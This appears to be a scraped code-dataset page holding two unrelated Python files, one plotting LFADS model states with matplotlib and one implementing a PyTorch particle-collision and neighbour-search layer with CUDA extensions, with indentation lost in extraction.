f = plt.figure(figsize=(12,8))
for k in prior_dicts:
for j in prior_dicts[k]:
plt.subplot(2,3,next(pidxs));
data = prior_dicts[k][j]
if "log" in j:
data = onp.exp(data)
j_title = j.strip('log')
else:
j_title = j
plt.stem(data)
plt.title(k + ' ' + j_title)
return f
def plot_lfads(x_txd, avg_lfads_dict, data_dict=None, dd_bidx=None,
renorm_fun=None):
"""Plot the full state ofLFADS operating on a single example."""
print("bidx: ", dd_bidx)
ld = avg_lfads_dict
def remove_outliers(A, nstds=3):
clip = nstds * onp.std(A)
A_mean = onp.mean(A)
A_show = onp.where(A < A_mean - clip, A_mean - clip, A)
return onp.where(A_show > A_mean + clip, A_mean + clip, A_show)
f = plt.figure(figsize=(12,12))
plt.subplot(361)
plt.imshow(x_txd.T)
plt.title('x')
plt.subplot(362)
x_enc = remove_outliers(ld['xenc_t'])
plt.imshow(x_enc.T)
plt.title('x enc')
plt.subplot(363)
gen = remove_outliers(ld['gen_t'])
plt.imshow(gen.T)
plt.title('generator')
plt.subplot(364)
factors = remove_outliers(ld['factor_t'])
plt.imshow(factors.T)
plt.title('factors')
if data_dict is not None:
true_rates = renorm_fun(data_dict['hiddens'][dd_bidx])
plt.subplot(366)
plt.imshow(true_rates.T)
plt.title('True rates')
plt.subplot(365)
rates = remove_outliers(onp.exp(ld['lograte_t']))
plt.imshow(rates.T)
plt.title('rates')
plt.subplot(334)
ic_mean = ld['ic_mean']
ic_std = onp.exp(0.5*ld['ic_logvar'])
plt.stem(ic_mean)
plt.title('g0 mean')
plt.subplot(335)
con = remove_outliers(ld['c_t'])
plt.imshow(con.T)
plt.title('controller')
plt.subplot(336)
ii_mean = ld['ii_mean_t']
plt.plot(ii_mean, 'b')
if data_dict is not None:
true_input = data_dict['inputs'][dd_bidx]
slope, intercept, r_value, p_value, std_err = \
stats.linregress(true_input.T, ii_mean.T)
plt.plot(slope*true_input + intercept, 'm', lw=2)
#plt.plot(ld['ii_t'], 'k')
plt.title('inferred input mean')
plt.legend(('LFADS inferred input', 'rescaled true input to integrator RNN'))
plt.subplot(313)
ntoplot=8
a = 0.25
plt.plot(rates[:, 0:ntoplot] + a*onp.arange(0, ntoplot, 1), 'b')
plt.plot(true_rates[:, 0:ntoplot] + a*onp.arange(0, ntoplot, 1), 'r')
plt.title('LFADS rates (blue), True rates (red)')
plt.xlabel('timesteps')
return f
|
|
import numbers
import numpy as np
import torch
import torch.autograd
import _ext
import _extc
import error_checking as ec
class ReorderData(torch.nn.Module):
""" TODO
"""
def __init__(self, reverse=False):
""" TODO
if reverse: ret[idxs] = input
else: ret = input[idxs]
"""
super(ReorderData, self).__init__()
self.reverse = (1 if reverse else 0)
def forward(self, idxs, locs, data=None):
""" TODO
Inputs:
-locs: A BxNxD tensor where B is the batch size, N is the number
of particles, and D is the dimensionality of the particles'
coordinate space.
-data: [optional] A BxNxC tensor where C is the number of channels.
"""
# Error checking.
batch_size = locs.size()[0]
N = locs.size()[1]
ec.check_tensor_dims(locs, "locs", (batch_size, N, -1))
ec.check_tensor_dims(idxs, "idxs", (batch_size, N))
if data is not None:
ec.check_tensor_dims(data, "data", (batch_size, N, -1))
data = data.contiguous()
no_data = False
else:
data = torch.autograd.Variable(
locs.data.new(), requires_grad=False)
no_data = True
locs = locs.contiguous()
idxs = idxs.contiguous()
# Do the compution.
coll = _ReorderDataFunction(self.reverse)
locs, data = coll(idxs, locs, data)
if no_data:
return locs
else:
return locs, data
class ParticleCollision(torch.nn.Module):
""" TODO
"""
def __init__(self, ndim, radius, max_grid_dim=96, max_collisions=128, include_self=True):
""" Initialize a Particle Collision layer.
Arguments:
-ndim: The dimensionality of the particle's coordinate space.
-radius: The radius to use when computing the neighbors for each query point.
-max_grid_dim: The maximum size of all the dimensions for the internal hash
grid. Set this value lower if you are running out of memory.
-max_collisions: The maximum number of neighbors a particle may have.
-include_self: If False, then if the distance between a query location and the
particle is 0, that particle will not be included in that query
location's neighbor list.
"""
super(ParticleCollision, self).__init__()
self.ndim = ec.check_conditions(ndim, "ndim",
"%s > 0", "%s < " +
str(_ext.spn_max_cartesian_dim()),
"isinstance(%s, numbers.Integral)")
self.radius = ec.check_conditions(radius, "radius",
"%s >= 0", "isinstance(%s, numbers.Real)")
self.max_grid_dim = ec.check_conditions(max_grid_dim, "max_grid_dim",
"%s > 0", "isinstance(%s, numbers.Integral)")
self.max_collisions = ec.check_conditions(max_collisions, "max_collisions",
"%s > 0", "isinstance(%s, numbers.Integral)")
self.include_self = 1 if include_self else 0
self.radixsort_buffer_size = -1
self.register_buffer("cellIDs", torch.zeros(1, 1))
self.register_buffer("cellStarts", torch.zeros(1, max_grid_dim**ndim))
self.register_buffer("cellEnds", torch.zeros(1, max_grid_dim**ndim))
self.register_buffer("cuda_buffer", torch.zeros(1,))
self.reorder = ReorderData(reverse=False)
def forward(self, locs, data=None, qlocs=None):
""" Compute the neighbors of each location. Reorders the locs and data tensors
in place and returns the list of indices in their new order and the list of
neighbors for each location.
Inputs:
-locs: A BxNxD tensor where B is the batch size, N is the number
of particles, and D is the dimensionality of the particles'
coordinate space.
-data: [optional] A BxNxC tensor where C is the number of channels.
Add this to have it reordered alongside locs.
-qlocs: [optional] A BxMxD tensor of query locations. The neighbors
list in the output will be a list of all particles in locs
that neighbor each query location. If not provided, locs is
used instead.
Returns:
-locs: A BxNxD tensor identical to the input locs, except reordered
for optimized memory access.
-data: [optional] A BxNxC tensor identical to the input data reordered
in the same order as locs. If the input data was not provided,
then this is not returned.
-Idxs: BxN tensor with the original index of each particle location in their
new order, e.g., idxs[b, i] = j where b is the batch index, j is
the original index in locs, and i is the new index.
-Neighbors: BxMxK where K is max_neighbors. This lists the indices of
all particles within radius of each query location, up to K. If
there are fewer than K neighbors, -1 is used to indicate
the end of the neighbor list. The indices are with respect to
the reordered locs tensor. If qlocs is not specified, then
locs is used as the query points and it is reordered before
being queried, so the neighbors tensor is also reorderd.
"""
# Error checking.
batch_size = locs.size()[0]
N = locs.size()[1]
ec.check_tensor_dims(locs, "locs", (batch_size, N, self.ndim))
if data is not None:
ec.check_tensor_dims(data, "data", (batch_size, N, -1))
data = data.contiguous()
has_data = True
else:
has_data = False
if qlocs is not None:
ec.check_tensor_dims(qlocs, "qlocs", (batch_size, -1, self.ndim))
qlocs = qlocs.contiguous()
locs = locs.contiguous()
# Resize the internal buffers to be the right size.
buffers = [self.cellIDs, self.cellStarts, self.cellEnds]
for buf in buffers:
if buf.size()[0] != batch_size:
ns = (batch_size,) + buf.size()[1:]
buf.resize_(ns)
if self.cellIDs.size()[1] != N or self.cellIDs.size()[0] != batch_size + 2:
# Allocate 2 extra batches on cellIDs for sorting.
self.cellIDs.resize_(batch_size + 2, N, 1)
if locs.is_cuda:
if self.radixsort_buffer_size < 0:
self.radixsort_buffer_size = _extc.spnc_get_radixsort_buffer_size()
bufsize = max(self.radixsort_buffer_size,
int(np.prod(locs.size()) + (np.prod(data.size()) if has_data else 0)))
if self.cuda_buffer.size()[0] != bufsize:
self.cuda_buffer.resize_(bufsize)
# Compute grid bounds.
lower_bounds, _ = locs.min(1)
upper_bounds, _ = locs.max(1)
grid_dims = torch.ceil(torch.clamp((upper_bounds - lower_bounds)/self.radius,
0, self.max_grid_dim))
center = (lower_bounds + upper_bounds)/2
lower_bounds = center - grid_dims*self.radius/2
lower_bounds = lower_bounds.contiguous()
grid_dims = grid_dims.contiguous()
# Get the new hashgrid order.
hashorder = _HashgridOrderFunction(self.radius, self.max_grid_dim, self.cellIDs,
self.cuda_buffer)
idxs = hashorder(locs, lower_bounds, grid_dims)
# Reorder the locs and data.
if has_data:
locs, data = self.reorder(idxs, locs, data)
else:
locs = self.reorder(idxs, locs)
# Do the collision compution.
coll = _ParticleCollisionFunction(self.radius, self.max_collisions, self.cellIDs,
self.cellStarts, self.cellEnds, self.include_self)
neighbors = coll(qlocs if qlocs is not None else locs,
locs, lower_bounds, grid_dims)
if has_data:
return locs, data, idxs, neighbors
else:
return locs, idxs, neighbors
"""
INTERNAL FUNCTIONS
"""
class _HashgridOrderFunction(torch.autograd.Function):
def __init__(self, radius, max_grid_dim, cellIDs, cuda_buffer):
super(_HashgridOrderFunction, self).__init__()
self.radius = radius
self.max_grid_dim = max_grid_dim
self.cellIDs = cellIDs
self.cuda_buffer = cuda_buffer
def forward(self, locs, lower_bounds, grid_dims):
self.save_for_backward(locs, lower_bounds, grid_dims)
batch_size = locs.size()[0]
N = locs.size()[1]
idxs = locs.new(batch_size, N)
self.cellIDs.fill_(0)
if locs.is_cuda:
if not _extc.spnc_hashgrid_order(locs, lower_bounds, grid_dims,
self.cellIDs, idxs, self.cuda_buffer, self.radius):
raise Exception("Cuda error")
else:
_ext.spn_hashgrid_order(locs, lower_bounds, grid_dims,
self.cellIDs, idxs, self.radius)
return idxs
def backward(self, grad_idxs):
locs, lower_bounds, grid_dims = self.saved_tensors
return (
grad_idxs.new(locs.size()).fill_(0),
grad_idxs.new(lower_bounds.size()).fill_(0),
grad_idxs.new(grid_dims.size()).fill_(0),)
class _ParticleCollisionFunction(torch.autograd.Function):
def __init__(self, radius, max_collisions, cellIDs, cellStarts, cellEnds,
include_self):
super(_ParticleCollisionFunction, self).__init__()
self.radius = radius
self.max_collisions = max_collisions
self.cellIDs = cellIDs
self.cellStarts = cellStarts
self.cellEnds = cellEnds
self.include_self = include_self
def forward(self, qlocs, locs, lower_bounds, grid_dims):
self.save_for_backward(qlocs, locs, lower_bounds, grid_dims)
batch_size = locs.size()[0]
M = qlocs.size()[1]
neighbors = locs.new(batch_size, M, self.max_collisions)
neighbors.fill_(-1)
self.cellStarts.fill_(0)
self.cellEnds.fill_(0)
if locs.is_cuda:
if not _extc.spnc_compute_collisions(qlocs, locs, lower_bounds, grid_dims, self.cellIDs,
self.cellStarts, self.cellEnds, neighbors, self.radius, self.radius,
self.include_self):
raise Exception("Cuda error")
else:
_ext.spn_compute_collisions(qlocs, locs, lower_bounds, grid_dims, self.cellIDs,
self.cellStarts, self.cellEnds, neighbors, self.radius, self.radius, self.include_self)
return neighbors
def backward(self, grad_neighbors):
qlocs, locs, lower_bounds, grid_dims = self.saved_tensors
return (
grad_neighbors.new(qlocs.size()).fill_(0),
grad_neighbors.new(locs.size()).fill_(0),
grad_neighbors.new(lower_bounds.size()).fill_(0),
grad_neighbors.new(grid_dims.size()).fill_(0),)
class _ReorderDataFunction(torch.autograd.Function):
def __init__(self, reverse):
super(_ReorderDataFunction, self).__init__()
self.reverse = reverse
def forward(self, idxs, locs, data):
self.save_for_backward(idxs,)
nlocs = locs.new(*locs.size())
ndata = locs.new(*data.size())
if locs.is_cuda:
if not _extc.spnc_reorder_data(locs, data, idxs, nlocs, ndata, self.reverse):
raise Exception("Cuda error")
else:
_ext.spn_reorder_data(locs, data, idxs, nlocs, ndata, self.reverse)
return nlocs, ndata
def backward(self, grad_locs, grad_data):
idxs, = self.saved_tensors
nlocs = grad_locs.new(*grad_locs.size())
ndata = grad_data.new(*grad_data.size())
if grad_locs.is_cuda:
if not _extc.spnc_reorder_data(grad_locs, grad_data, idxs, nlocs,
ndata, 1 - self.reverse):
raise Exception("Cuda error")
else:
_ext.spn_reorder_data(grad_locs, grad_data, idxs, nlocs, ndata,
1 - self.reverse)
return idxs.new(idxs.size()).fill_(0), nlocs, ndata
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.